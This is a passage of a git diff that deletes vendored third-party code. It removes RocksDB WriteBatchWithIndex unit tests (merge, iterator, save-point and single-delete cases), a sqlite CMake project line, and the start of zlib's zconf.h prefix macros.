-    s = batch.GetFromBatch(column_family, options, "z", &value);
-    ASSERT_TRUE(s.IsMergeInProgress());
-  }
-
-  delete db;
-  DestroyDB(dbname, options);
-}
-
-TEST_F(WriteBatchWithIndexTest, TestGetFromBatchMerge2) {
-  DB* db;
-  Options options;
-  options.merge_operator = MergeOperators::CreateFromStringId("stringappend");
-  options.create_if_missing = true;
-
-  std::string dbname = test::TmpDir() + "/write_batch_with_index_test";
-
-  DestroyDB(dbname, options);
-  Status s = DB::Open(options, dbname, &db);
-  ASSERT_OK(s);
-
-  ColumnFamilyHandle* column_family = db->DefaultColumnFamily();
-
-  // Test batch with overwrite_key=true
-  WriteBatchWithIndex batch(BytewiseComparator(), 0, true);
-  std::string value;
-
-  s = batch.GetFromBatch(column_family, options, "X", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  batch.Put(column_family, "X", "x");
-  s = batch.GetFromBatch(column_family, options, "X", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("x", value);
-
-  batch.Put(column_family, "X", "x2");
-  s = batch.GetFromBatch(column_family, options, "X", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("x2", value);
-
-  batch.Merge(column_family, "X", "aaa");
-  s = batch.GetFromBatch(column_family, options, "X", &value);
-  ASSERT_TRUE(s.IsMergeInProgress());
-
-  batch.Merge(column_family, "X", "bbb");
-  s = batch.GetFromBatch(column_family, options, "X", &value);
-  ASSERT_TRUE(s.IsMergeInProgress());
-
-  batch.Put(column_family, "X", "x3");
-  s = batch.GetFromBatch(column_family, options, "X", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("x3", value);
-
-  batch.Merge(column_family, "X", "ccc");
-  s = batch.GetFromBatch(column_family, options, "X", &value);
-  ASSERT_TRUE(s.IsMergeInProgress());
-
-  batch.Delete(column_family, "X");
-  s = batch.GetFromBatch(column_family, options, "X", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  batch.Merge(column_family, "X", "ddd");
-  s = batch.GetFromBatch(column_family, options, "X", &value);
-  ASSERT_TRUE(s.IsMergeInProgress());
-
-  delete db;
-  DestroyDB(dbname, options);
-}
-
-TEST_F(WriteBatchWithIndexTest, TestGetFromBatchAndDB) {
-  DB* db;
-  Options options;
-  options.create_if_missing = true;
-  std::string dbname = test::TmpDir() + "/write_batch_with_index_test";
-
-  DestroyDB(dbname, options);
-  Status s = DB::Open(options, dbname, &db);
-  ASSERT_OK(s);
-
-  WriteBatchWithIndex batch;
-  ReadOptions read_options;
-  WriteOptions write_options;
-  std::string value;
-
-  s = db->Put(write_options, "a", "a");
-  ASSERT_OK(s);
-
-  s = db->Put(write_options, "b", "b");
-  ASSERT_OK(s);
-
-  s = db->Put(write_options, "c", "c");
-  ASSERT_OK(s);
-
-  batch.Put("a", "batch.a");
-  batch.Delete("b");
-
-  s = batch.GetFromBatchAndDB(db, read_options, "a", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("batch.a", value);
-
-  s = batch.GetFromBatchAndDB(db, read_options, "b", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = batch.GetFromBatchAndDB(db, read_options, "c", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("c", value);
-
-  s = batch.GetFromBatchAndDB(db, read_options, "x", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  db->Delete(write_options, "x");
-
-  s = batch.GetFromBatchAndDB(db, read_options, "x", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  delete db;
-  DestroyDB(dbname, options);
-}
-
-TEST_F(WriteBatchWithIndexTest, TestGetFromBatchAndDBMerge) {
-  DB* db;
-  Options options;
-
-  options.create_if_missing = true;
-  std::string dbname = test::TmpDir() + "/write_batch_with_index_test";
-
-  options.merge_operator = MergeOperators::CreateFromStringId("stringappend");
-
-  DestroyDB(dbname, options);
-  Status s = DB::Open(options, dbname, &db);
-  assert(s.ok());
-
-  WriteBatchWithIndex batch;
-  ReadOptions read_options;
-  WriteOptions write_options;
-  std::string value;
-
-  s = db->Put(write_options, "a", "a0");
-  ASSERT_OK(s);
-
-  s = db->Put(write_options, "b", "b0");
-  ASSERT_OK(s);
-
-  s = db->Merge(write_options, "b", "b1");
-  ASSERT_OK(s);
-
-  s = db->Merge(write_options, "c", "c0");
-  ASSERT_OK(s);
-
-  s = db->Merge(write_options, "d", "d0");
-  ASSERT_OK(s);
-
-  batch.Merge("a", "a1");
-  batch.Merge("a", "a2");
-  batch.Merge("b", "b2");
-  batch.Merge("d", "d1");
-  batch.Merge("e", "e0");
-
-  s = batch.GetFromBatchAndDB(db, read_options, "a", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("a0,a1,a2", value);
-
-  s = batch.GetFromBatchAndDB(db, read_options, "b", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("b0,b1,b2", value);
-
-  s = batch.GetFromBatchAndDB(db, read_options, "c", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("c0", value);
-
-  s = batch.GetFromBatchAndDB(db, read_options, "d", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("d0,d1", value);
-
-  s = batch.GetFromBatchAndDB(db, read_options, "e", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("e0", value);
-
-  s = db->Delete(write_options, "x");
-  ASSERT_OK(s);
-
-  s = batch.GetFromBatchAndDB(db, read_options, "x", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  const Snapshot* snapshot = db->GetSnapshot();
-  ReadOptions snapshot_read_options;
-  snapshot_read_options.snapshot = snapshot;
-
-  s = db->Delete(write_options, "a");
-  ASSERT_OK(s);
-
-  s = batch.GetFromBatchAndDB(db, read_options, "a", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("a1,a2", value);
-
-  s = batch.GetFromBatchAndDB(db, snapshot_read_options, "a", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("a0,a1,a2", value);
-
-  batch.Delete("a");
-
-  s = batch.GetFromBatchAndDB(db, read_options, "a", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = batch.GetFromBatchAndDB(db, snapshot_read_options, "a", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = db->Merge(write_options, "c", "c1");
-  ASSERT_OK(s);
-
-  s = batch.GetFromBatchAndDB(db, read_options, "c", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("c0,c1", value);
-
-  s = batch.GetFromBatchAndDB(db, snapshot_read_options, "c", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("c0", value);
-
-  s = db->Put(write_options, "e", "e1");
-  ASSERT_OK(s);
-
-  s = batch.GetFromBatchAndDB(db, read_options, "e", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("e1,e0", value);
-
-  s = batch.GetFromBatchAndDB(db, snapshot_read_options, "e", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("e0", value);
-
-  s = db->Delete(write_options, "e");
-  ASSERT_OK(s);
-
-  s = batch.GetFromBatchAndDB(db, read_options, "e", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("e0", value);
-
-  s = batch.GetFromBatchAndDB(db, snapshot_read_options, "e", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("e0", value);
-
-  db->ReleaseSnapshot(snapshot);
-  delete db;
-  DestroyDB(dbname, options);
-}
-
-TEST_F(WriteBatchWithIndexTest, TestGetFromBatchAndDBMerge2) {
-  DB* db;
-  Options options;
-
-  options.create_if_missing = true;
-  std::string dbname = test::TmpDir() + "/write_batch_with_index_test";
-
-  options.merge_operator = MergeOperators::CreateFromStringId("stringappend");
-
-  DestroyDB(dbname, options);
-  Status s = DB::Open(options, dbname, &db);
-  assert(s.ok());
-
-  // Test batch with overwrite_key=true
-  WriteBatchWithIndex batch(BytewiseComparator(), 0, true);
-
-  ReadOptions read_options;
-  WriteOptions write_options;
-  std::string value;
-
-  s = batch.GetFromBatchAndDB(db, read_options, "A", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  batch.Merge("A", "xxx");
-
-  s = batch.GetFromBatchAndDB(db, read_options, "A", &value);
-  ASSERT_TRUE(s.IsMergeInProgress());
-
-  batch.Merge("A", "yyy");
-
-  s = batch.GetFromBatchAndDB(db, read_options, "A", &value);
-  ASSERT_TRUE(s.IsMergeInProgress());
-
-  s = db->Put(write_options, "A", "a0");
-  ASSERT_OK(s);
-
-  s = batch.GetFromBatchAndDB(db, read_options, "A", &value);
-  ASSERT_TRUE(s.IsMergeInProgress());
-
-  batch.Delete("A");
-
-  s = batch.GetFromBatchAndDB(db, read_options, "A", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  delete db;
-  DestroyDB(dbname, options);
-}
-
-void AssertKey(std::string key, WBWIIterator* iter) {
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(key, iter->Entry().key.ToString());
-}
-
-void AssertValue(std::string value, WBWIIterator* iter) {
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(value, iter->Entry().value.ToString());
-}
-
-// Tests that we can write to the WBWI while we iterate (from a single thread).
-// iteration should see the newest writes
-TEST_F(WriteBatchWithIndexTest, MutateWhileIteratingCorrectnessTest) {
-  WriteBatchWithIndex batch(BytewiseComparator(), 0, true);
-  for (char c = 'a'; c <= 'z'; ++c) {
-    batch.Put(std::string(1, c), std::string(1, c));
-  }
-
-  std::unique_ptr<WBWIIterator> iter(batch.NewIterator());
-  iter->Seek("k");
-  AssertKey("k", iter.get());
-  iter->Next();
-  AssertKey("l", iter.get());
-  batch.Put("ab", "cc");
-  iter->Next();
-  AssertKey("m", iter.get());
-  batch.Put("mm", "kk");
-  iter->Next();
-  AssertKey("mm", iter.get());
-  AssertValue("kk", iter.get());
-  batch.Delete("mm");
-
-  iter->Next();
-  AssertKey("n", iter.get());
-  iter->Prev();
-  AssertKey("mm", iter.get());
-  ASSERT_EQ(kDeleteRecord, iter->Entry().type);
-
-  iter->Seek("ab");
-  AssertKey("ab", iter.get());
-  batch.Delete("x");
-  iter->Seek("x");
-  AssertKey("x", iter.get());
-  ASSERT_EQ(kDeleteRecord, iter->Entry().type);
-  iter->Prev();
-  AssertKey("w", iter.get());
-}
-
-void AssertIterKey(std::string key, Iterator* iter) {
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(key, iter->key().ToString());
-}
-
-void AssertIterValue(std::string value, Iterator* iter) {
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(value, iter->value().ToString());
-}
-
-// same thing as above, but testing IteratorWithBase
-TEST_F(WriteBatchWithIndexTest, MutateWhileIteratingBaseCorrectnessTest) {
-  WriteBatchWithIndex batch(BytewiseComparator(), 0, true);
-  for (char c = 'a'; c <= 'z'; ++c) {
-    batch.Put(std::string(1, c), std::string(1, c));
-  }
-
-  KVMap map;
-  map["aa"] = "aa";
-  map["cc"] = "cc";
-  map["ee"] = "ee";
-  map["em"] = "me";
-
-  std::unique_ptr<Iterator> iter(
-      batch.NewIteratorWithBase(new KVIter(&map)));
-  iter->Seek("k");
-  AssertIterKey("k", iter.get());
-  iter->Next();
-  AssertIterKey("l", iter.get());
-  batch.Put("ab", "cc");
-  iter->Next();
-  AssertIterKey("m", iter.get());
-  batch.Put("mm", "kk");
-  iter->Next();
-  AssertIterKey("mm", iter.get());
-  AssertIterValue("kk", iter.get());
-  batch.Delete("mm");
-  iter->Next();
-  AssertIterKey("n", iter.get());
-  iter->Prev();
-  // "mm" is deleted, so we're back at "m"
-  AssertIterKey("m", iter.get());
-
-  iter->Seek("ab");
-  AssertIterKey("ab", iter.get());
-  iter->Prev();
-  AssertIterKey("aa", iter.get());
-  iter->Prev();
-  AssertIterKey("a", iter.get());
-  batch.Delete("aa");
-  iter->Next();
-  AssertIterKey("ab", iter.get());
-  iter->Prev();
-  AssertIterKey("a", iter.get());
-
-  batch.Delete("x");
-  iter->Seek("x");
-  AssertIterKey("y", iter.get());
-  iter->Next();
-  AssertIterKey("z", iter.get());
-  iter->Prev();
-  iter->Prev();
-  AssertIterKey("w", iter.get());
-
-  batch.Delete("e");
-  iter->Seek("e");
-  AssertIterKey("ee", iter.get());
-  AssertIterValue("ee", iter.get());
-  batch.Put("ee", "xx");
-  // still the same value
-  AssertIterValue("ee", iter.get());
-  iter->Next();
-  AssertIterKey("em", iter.get());
-  iter->Prev();
-  // new value
-  AssertIterValue("xx", iter.get());
-}
-
-// stress testing mutations with IteratorWithBase
-TEST_F(WriteBatchWithIndexTest, MutateWhileIteratingBaseStressTest) {
-  WriteBatchWithIndex batch(BytewiseComparator(), 0, true);
-  for (char c = 'a'; c <= 'z'; ++c) {
-    batch.Put(std::string(1, c), std::string(1, c));
-  }
-
-  KVMap map;
-  for (char c = 'a'; c <= 'z'; ++c) {
-    map[std::string(2, c)] = std::string(2, c);
-  }
-
-  std::unique_ptr<Iterator> iter(
-      batch.NewIteratorWithBase(new KVIter(&map)));
-
-  Random rnd(301);
-  for (int i = 0; i < 1000000; ++i) {
-    int random = rnd.Uniform(8);
-    char c = static_cast<char>(rnd.Uniform(26) + 'a');
-    switch (random) {
-      case 0:
-        batch.Put(std::string(1, c), "xxx");
-        break;
-      case 1:
-        batch.Put(std::string(2, c), "xxx");
-        break;
-      case 2:
-        batch.Delete(std::string(1, c));
-        break;
-      case 3:
-        batch.Delete(std::string(2, c));
-        break;
-      case 4:
-        iter->Seek(std::string(1, c));
-        break;
-      case 5:
-        iter->Seek(std::string(2, c));
-        break;
-      case 6:
-        if (iter->Valid()) {
-          iter->Next();
-        }
-        break;
-      case 7:
-        if (iter->Valid()) {
-          iter->Prev();
-        }
-        break;
-      default:
-        assert(false);
-    }
-  }
-}
-
-static std::string PrintContents(WriteBatchWithIndex* batch,
-                                 ColumnFamilyHandle* column_family) {
-  std::string result;
-
-  WBWIIterator* iter;
-  if (column_family == nullptr) {
-    iter = batch->NewIterator();
-  } else {
-    iter = batch->NewIterator(column_family);
-  }
-
-  iter->SeekToFirst();
-  while (iter->Valid()) {
-    WriteEntry e = iter->Entry();
-
-    if (e.type == kPutRecord) {
-      result.append("PUT(");
-      result.append(e.key.ToString());
-      result.append("):");
-      result.append(e.value.ToString());
-    } else if (e.type == kMergeRecord) {
-      result.append("MERGE(");
-      result.append(e.key.ToString());
-      result.append("):");
-      result.append(e.value.ToString());
-    } else if (e.type == kSingleDeleteRecord) {
-      result.append("SINGLE-DEL(");
-      result.append(e.key.ToString());
-      result.append(")");
-    } else {
-      assert(e.type == kDeleteRecord);
-      result.append("DEL(");
-      result.append(e.key.ToString());
-      result.append(")");
-    }
-
-    result.append(",");
-    iter->Next();
-  }
-
-  delete iter;
-  return result;
-}
-
-static std::string PrintContents(WriteBatchWithIndex* batch, KVMap* base_map,
-                                 ColumnFamilyHandle* column_family) {
-  std::string result;
-
-  Iterator* iter;
-  if (column_family == nullptr) {
-    iter = batch->NewIteratorWithBase(new KVIter(base_map));
-  } else {
-    iter = batch->NewIteratorWithBase(column_family, new KVIter(base_map));
-  }
-
-  iter->SeekToFirst();
-  while (iter->Valid()) {
-    assert(iter->status().ok());
-
-    Slice key = iter->key();
-    Slice value = iter->value();
-
-    result.append(key.ToString());
-    result.append(":");
-    result.append(value.ToString());
-    result.append(",");
-
-    iter->Next();
-  }
-
-  delete iter;
-  return result;
-}
-
-TEST_F(WriteBatchWithIndexTest, SavePointTest) {
-  WriteBatchWithIndex batch;
-  ColumnFamilyHandleImplDummy cf1(1, BytewiseComparator());
-  Status s;
-
-  batch.Put("A", "a");
-  batch.Put("B", "b");
-  batch.Put("A", "aa");
-  batch.Put(&cf1, "A", "a1");
-  batch.Delete(&cf1, "B");
-  batch.Put(&cf1, "C", "c1");
-  batch.Put(&cf1, "E", "e1");
-
-  batch.SetSavePoint();  // 1
-
-  batch.Put("C", "cc");
-  batch.Put("B", "bb");
-  batch.Delete("A");
-  batch.Put(&cf1, "B", "b1");
-  batch.Delete(&cf1, "A");
-  batch.SingleDelete(&cf1, "E");
-  batch.SetSavePoint();  // 2
-
-  batch.Put("A", "aaa");
-  batch.Put("A", "xxx");
-  batch.Delete("B");
-  batch.Put(&cf1, "B", "b2");
-  batch.Delete(&cf1, "C");
-  batch.SetSavePoint();  // 3
-  batch.SetSavePoint();  // 4
-  batch.SingleDelete("D");
-  batch.Delete(&cf1, "D");
-  batch.Delete(&cf1, "E");
-
-  ASSERT_EQ(
-      "PUT(A):a,PUT(A):aa,DEL(A),PUT(A):aaa,PUT(A):xxx,PUT(B):b,PUT(B):bb,DEL("
-      "B)"
-      ",PUT(C):cc,SINGLE-DEL(D),",
-      PrintContents(&batch, nullptr));
-
-  ASSERT_EQ(
-      "PUT(A):a1,DEL(A),DEL(B),PUT(B):b1,PUT(B):b2,PUT(C):c1,DEL(C),"
-      "DEL(D),PUT(E):e1,SINGLE-DEL(E),DEL(E),",
-      PrintContents(&batch, &cf1));
-
-  ASSERT_OK(batch.RollbackToSavePoint());  // rollback to 4
-  ASSERT_EQ(
-      "PUT(A):a,PUT(A):aa,DEL(A),PUT(A):aaa,PUT(A):xxx,PUT(B):b,PUT(B):bb,DEL("
-      "B)"
-      ",PUT(C):cc,",
-      PrintContents(&batch, nullptr));
-
-  ASSERT_EQ(
-      "PUT(A):a1,DEL(A),DEL(B),PUT(B):b1,PUT(B):b2,PUT(C):c1,DEL(C),"
-      "PUT(E):e1,SINGLE-DEL(E),",
-      PrintContents(&batch, &cf1));
-
-  ASSERT_OK(batch.RollbackToSavePoint());  // rollback to 3
-  ASSERT_EQ(
-      "PUT(A):a,PUT(A):aa,DEL(A),PUT(A):aaa,PUT(A):xxx,PUT(B):b,PUT(B):bb,DEL("
-      "B)"
-      ",PUT(C):cc,",
-      PrintContents(&batch, nullptr));
-
-  ASSERT_EQ(
-      "PUT(A):a1,DEL(A),DEL(B),PUT(B):b1,PUT(B):b2,PUT(C):c1,DEL(C),"
-      "PUT(E):e1,SINGLE-DEL(E),",
-      PrintContents(&batch, &cf1));
-
-  ASSERT_OK(batch.RollbackToSavePoint());  // rollback to 2
-  ASSERT_EQ("PUT(A):a,PUT(A):aa,DEL(A),PUT(B):b,PUT(B):bb,PUT(C):cc,",
-            PrintContents(&batch, nullptr));
-
-  ASSERT_EQ(
-      "PUT(A):a1,DEL(A),DEL(B),PUT(B):b1,PUT(C):c1,"
-      "PUT(E):e1,SINGLE-DEL(E),",
-      PrintContents(&batch, &cf1));
-
-  batch.SetSavePoint();  // 5
-  batch.Put("X", "x");
-
-  ASSERT_EQ("PUT(A):a,PUT(A):aa,DEL(A),PUT(B):b,PUT(B):bb,PUT(C):cc,PUT(X):x,",
-            PrintContents(&batch, nullptr));
-
-  ASSERT_OK(batch.RollbackToSavePoint());  // rollback to 5
-  ASSERT_EQ("PUT(A):a,PUT(A):aa,DEL(A),PUT(B):b,PUT(B):bb,PUT(C):cc,",
-            PrintContents(&batch, nullptr));
-
-  ASSERT_EQ(
-      "PUT(A):a1,DEL(A),DEL(B),PUT(B):b1,PUT(C):c1,"
-      "PUT(E):e1,SINGLE-DEL(E),",
-      PrintContents(&batch, &cf1));
-
-  ASSERT_OK(batch.RollbackToSavePoint());  // rollback to 1
-  ASSERT_EQ("PUT(A):a,PUT(A):aa,PUT(B):b,", PrintContents(&batch, nullptr));
-
-  ASSERT_EQ("PUT(A):a1,DEL(B),PUT(C):c1,PUT(E):e1,",
-            PrintContents(&batch, &cf1));
-
-  s = batch.RollbackToSavePoint();  // no savepoint found
-  ASSERT_TRUE(s.IsNotFound());
-  ASSERT_EQ("PUT(A):a,PUT(A):aa,PUT(B):b,", PrintContents(&batch, nullptr));
-
-  ASSERT_EQ("PUT(A):a1,DEL(B),PUT(C):c1,PUT(E):e1,",
-            PrintContents(&batch, &cf1));
-
-  batch.SetSavePoint();  // 6
-
-  batch.Clear();
-  ASSERT_EQ("", PrintContents(&batch, nullptr));
-  ASSERT_EQ("", PrintContents(&batch, &cf1));
-
-  s = batch.RollbackToSavePoint();  // rollback to 6
-  ASSERT_TRUE(s.IsNotFound());
-}
-
-TEST_F(WriteBatchWithIndexTest, SingleDeleteTest) {
-  WriteBatchWithIndex batch;
-  Status s;
-  std::string value;
-  DBOptions db_options;
-
-  batch.SingleDelete("A");
-
-  s = batch.GetFromBatch(db_options, "A", &value);
-  ASSERT_TRUE(s.IsNotFound());
-  s = batch.GetFromBatch(db_options, "B", &value);
-  ASSERT_TRUE(s.IsNotFound());
-  value = PrintContents(&batch, nullptr);
-  ASSERT_EQ("SINGLE-DEL(A),", value);
-
-  batch.Clear();
-  batch.Put("A", "a");
-  batch.Put("A", "a2");
-  batch.Put("B", "b");
-  batch.SingleDelete("A");
-
-  s = batch.GetFromBatch(db_options, "A", &value);
-  ASSERT_TRUE(s.IsNotFound());
-  s = batch.GetFromBatch(db_options, "B", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("b", value);
-
-  value = PrintContents(&batch, nullptr);
-  ASSERT_EQ("PUT(A):a,PUT(A):a2,SINGLE-DEL(A),PUT(B):b,", value);
-
-  batch.Put("C", "c");
-  batch.Put("A", "a3");
-  batch.Delete("B");
-  batch.SingleDelete("B");
-  batch.SingleDelete("C");
-
-  s = batch.GetFromBatch(db_options, "A", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("a3", value);
-  s = batch.GetFromBatch(db_options, "B", &value);
-  ASSERT_TRUE(s.IsNotFound());
-  s = batch.GetFromBatch(db_options, "C", &value);
-  ASSERT_TRUE(s.IsNotFound());
-  s = batch.GetFromBatch(db_options, "D", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  value = PrintContents(&batch, nullptr);
-  ASSERT_EQ(
-      "PUT(A):a,PUT(A):a2,SINGLE-DEL(A),PUT(A):a3,PUT(B):b,DEL(B),SINGLE-DEL(B)"
-      ",PUT(C):c,SINGLE-DEL(C),",
-      value);
-
-  batch.Put("B", "b4");
-  batch.Put("C", "c4");
-  batch.Put("D", "d4");
-  batch.SingleDelete("D");
-  batch.SingleDelete("D");
-  batch.Delete("A");
-
-  s = batch.GetFromBatch(db_options, "A", &value);
-  ASSERT_TRUE(s.IsNotFound());
-  s = batch.GetFromBatch(db_options, "B", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("b4", value);
-  s = batch.GetFromBatch(db_options, "C", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("c4", value);
-  s = batch.GetFromBatch(db_options, "D", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  value = PrintContents(&batch, nullptr);
-  ASSERT_EQ(
-      "PUT(A):a,PUT(A):a2,SINGLE-DEL(A),PUT(A):a3,DEL(A),PUT(B):b,DEL(B),"
-      "SINGLE-DEL(B),PUT(B):b4,PUT(C):c,SINGLE-DEL(C),PUT(C):c4,PUT(D):d4,"
-      "SINGLE-DEL(D),SINGLE-DEL(D),",
-      value);
-}
-
-TEST_F(WriteBatchWithIndexTest, SingleDeleteDeltaIterTest) {
-  Status s;
-  std::string value;
-  DBOptions db_options;
-  WriteBatchWithIndex batch(BytewiseComparator(), 20, true /* overwrite_key */);
-  batch.Put("A", "a");
-  batch.Put("A", "a2");
-  batch.Put("B", "b");
-  batch.SingleDelete("A");
-  batch.Delete("B");
-
-  KVMap map;
-  value = PrintContents(&batch, &map, nullptr);
-  ASSERT_EQ("", value);
-
-  map["A"] = "aa";
-  map["C"] = "cc";
-  map["D"] = "dd";
-
-  batch.SingleDelete("B");
-  batch.SingleDelete("C");
-  batch.SingleDelete("Z");
-
-  value = PrintContents(&batch, &map, nullptr);
-  ASSERT_EQ("D:dd,", value);
-
-  batch.Put("A", "a3");
-  batch.Put("B", "b3");
-  batch.SingleDelete("A");
-  batch.SingleDelete("A");
-  batch.SingleDelete("D");
-  batch.SingleDelete("D");
-  batch.Delete("D");
-
-  map["E"] = "ee";
-
-  value = PrintContents(&batch, &map, nullptr);
-  ASSERT_EQ("B:b3,E:ee,", value);
-}
-
-}  // namespace
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main() {
-  fprintf(stderr, "SKIPPED\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/sqlite/CMakeLists.txt b/thirdparty/sqlite/CMakeLists.txt
index 9de5ccf..c67d991 100644
--- a/thirdparty/sqlite/CMakeLists.txt
+++ b/thirdparty/sqlite/CMakeLists.txt
@@ -17,6 +17,4 @@
 # under the License.
 #
 
-project(sqlite VERSION 3.22.0 LANGUAGES CXX)
-
 add_library(sqlite sqlite3.c)
diff --git a/thirdparty/zlib/include/zconf.h b/thirdparty/zlib/include/zconf.h
deleted file mode 100644
index a5e3452..0000000
--- a/thirdparty/zlib/include/zconf.h
+++ /dev/null
@@ -1,536 +0,0 @@
-/* zconf.h -- configuration of the zlib compression library
- * Copyright (C) 1995-2016 Jean-loup Gailly, Mark Adler
- * For conditions of distribution and use, see copyright notice in zlib.h
- */
-
-/* @(#) $Id$ */
-
-#ifndef ZCONF_H
-#define ZCONF_H
-/* #undef Z_PREFIX */
-#define Z_HAVE_UNISTD_H
-
-/*
- * If you *really* need a unique prefix for all types and library functions,
- * compile with -DZ_PREFIX. The "standard" zlib should be compiled without it.
- * Even better than compiling with -DZ_PREFIX would be to use configure to set
- * this permanently in zconf.h using "./configure --zprefix".
- */
-#ifdef Z_PREFIX     /* may be set to #if 1 by ./configure */
-#  define Z_PREFIX_SET
-
-/* all linked symbols and init macros */
-#  define _dist_code            z__dist_code
-#  define _length_code          z__length_code
-#  define _tr_align             z__tr_align
-#  define _tr_flush_bits        z__tr_flush_bits
-#  define _tr_flush_block       z__tr_flush_block
-#  define _tr_init              z__tr_init
-#  define _tr_stored_block      z__tr_stored_block
-#  define _tr_tally             z__tr_tally
-#  define adler32               z_adler32
-#  define adler32_combine       z_adler32_combine
-#  define adler32_combine64     z_adler32_combine64
-#  define adler32_z             z_adler32_z
-#  ifndef Z_SOLO
-#    define compress              z_compress
-#    define compress2             z_compress2
-#    define compressBound         z_compressBound
-#  endif
-#  define crc32                 z_crc32
-#  define crc32_combine         z_crc32_combine
-#  define crc32_combine64       z_crc32_combine64
-#  define crc32_z               z_crc32_z
-#  define deflate               z_deflate
-#  define deflateBound          z_deflateBound
-#  define deflateCopy           z_deflateCopy
-#  define deflateEnd            z_deflateEnd
-#  define deflateGetDictionary  z_deflateGetDictionary
-#  define deflateInit           z_deflateInit
-#  define deflateInit2          z_deflateInit2
-#  define deflateInit2_         z_deflateInit2_
-#  define deflateInit_          z_deflateInit_
-#  define deflateParams         z_deflateParams
-#  define deflatePending        z_deflatePending
-#  define deflatePrime          z_deflatePrime
-#  define deflateReset          z_deflateReset
-#  define deflateResetKeep      z_deflateResetKeep
-#  define deflateSetDictionary  z_deflateSetDictionary
-#  define deflateSetHeader      z_deflateSetHeader
-#  define deflateTune           z_deflateTune
-#  define deflate_copyright     z_deflate_copyright
-#  define get_crc_table         z_get_crc_table
-#  ifndef Z_SOLO
-#    define gz_error              z_gz_error
-#    define gz_intmax             z_gz_intmax
-#    define gz_strwinerror        z_gz_strwinerror
-#    define gzbuffer              z_gzbuffer
-#    define gzclearerr            z_gzclearerr
-#    define gzclose               z_gzclose
-#    define gzclose_r             z_gzclose_r
-#    define gzclose_w             z_gzclose_w
-#    define gzdirect              z_gzdirect
-#    define gzdopen               z_gzdopen
-#    define gzeof                 z_gzeof
-#    define gzerror               z_gzerror
-#    define gzflush               z_gzflush
-#    define gzfread               z_gzfread
-#    define gzfwrite              z_gzfwrite
-#    define gzgetc                z_gzgetc
-#    define gzgetc_               z_gzgetc_
-#    define gzgets                z_gzgets
-#    define gzoffset              z_gzoffset
-#    define gzoffset64            z_gzoffset64
-#    define gzopen                z_gzopen
-#    define gzopen64              z_gzopen64
-#    ifdef _WIN32
-#      define gzopen_w              z_gzopen_w
-#    endif
-#    define gzprintf              z_gzprintf
-#    define gzputc                z_gzputc
-#    define gzputs                z_gzputs
-#    define gzread                z_gzread
-#    define gzrewind              z_gzrewind
-#    define gzseek                z_gzseek
-#    define gzseek64              z_gzseek64
-#    define gzsetparams           z_gzsetparams
-#    define gztell                z_gztell
-#    define gztell64              z_gztell64
-#    define gzungetc              z_gzungetc
-#    define gzvprintf             z_gzvprintf
-#    define gzwrite               z_gzwrite
-#  endif
-#  define inflate               z_inflate
-#  define inflateBack           z_inflateBack
-#  define inflateBackEnd        z_inflateBackEnd
-#  define inflateBackInit       z_inflateBackInit
-#  define inflateBackInit_      z_inflateBackInit_
-#  define inflateCodesUsed      z_inflateCodesUsed
-#  define inflateCopy           z_inflateCopy
-#  define inflateEnd            z_inflateEnd
-#  define inflateGetDictionary  z_inflateGetDictionary
-#  define inflateGetHeader      z_inflateGetHeader
-#  define inflateInit           z_inflateInit
-#  define inflateInit2          z_inflateInit2
-#  define inflateInit2_         z_inflateInit2_
-#  define inflateInit_          z_inflateInit_
-#  define inflateMark           z_inflateMark
-#  define inflatePrime          z_inflatePrime
-#  define inflateReset          z_inflateReset
-#  define inflateReset2         z_inflateReset2
-#  define inflateResetKeep      z_inflateResetKeep
-#  define inflateSetDictionary  z_inflateSetDictionary
-#  define inflateSync           z_inflateSync
-#  define inflateSyncPoint      z_inflateSyncPoint
-#  define inflateUndermine      z_inflateUndermine
-#  define inflateValidate       z_inflateValidate
-#  define inflate_copyright     z_inflate_copyright
-#  define inflate_fast          z_inflate_fast
-#  define inflate_table         z_inflate_table
-#  ifndef Z_SOLO
-#    define uncompress            z_uncompress
-#    define uncompress2           z_uncompress2
-#  endif
-#  define zError                z_zError
-#  ifndef Z_SOLO
-#    define zcalloc               z_zcalloc
-#    define zcfree                z_zcfree
-#  endif
